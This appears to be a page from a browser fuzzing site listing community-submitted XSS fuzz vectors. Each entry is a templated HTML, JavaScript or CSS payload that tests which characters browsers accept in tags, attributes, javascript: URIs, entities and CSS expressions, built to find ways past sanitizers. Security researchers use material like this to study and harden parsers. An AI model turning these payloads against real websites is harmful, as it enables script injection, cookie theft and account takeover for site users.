Featured vector

Chrome 26.0
<img src=# aaa0x0donerror="alert(1)">

Fuzz vector cloud

2,119,178 Successful fuzzes

Fuzz Vectors

Your browser identified as

Default Browser unknown

All vectors

Description Vector Created by
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
Characters allowed after string multiline separator <script> var x = "asdf\*chr* asdf"; logChr(*num*); </script> @tifkin_
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
Characters after javascript uri <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @insertScript
characters allowd in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Characters before javascript uri <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @insertScript
Easter challenge min sequence 2 <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
Easter challenge min sequence <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
SVG script <svg><script*chr*>logChr(*num*)</script></svg> @garethheyes
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
Equals equivalent signs in attributes <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> @WisecWisec
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
is my browser leaking location <iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe> @garethheyes
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed inside jsurl <a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a> @avlidienbrunn
justatest2 <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> @evilcos
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Cookie fuzzing <script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
Characters allowed as vbscript variables <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> @garethheyes
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
aaaaa <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @goroasd
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes
img srcX onerroralert(1) <div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div> @qbye
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Marios challenge <*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script> @0xAli
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Eating backslash <img src=xx:xx onerror="x='*chr*\',logChr(*num*)//'"> @garethheyes
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Hex characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Document body variables <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Document variables <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> @garethheyes
Function variables <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Object variables <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Number variables <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
String variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Regexp variables <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Array variables <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Window variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters allowed before paren <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Uncode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters trimmed my trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes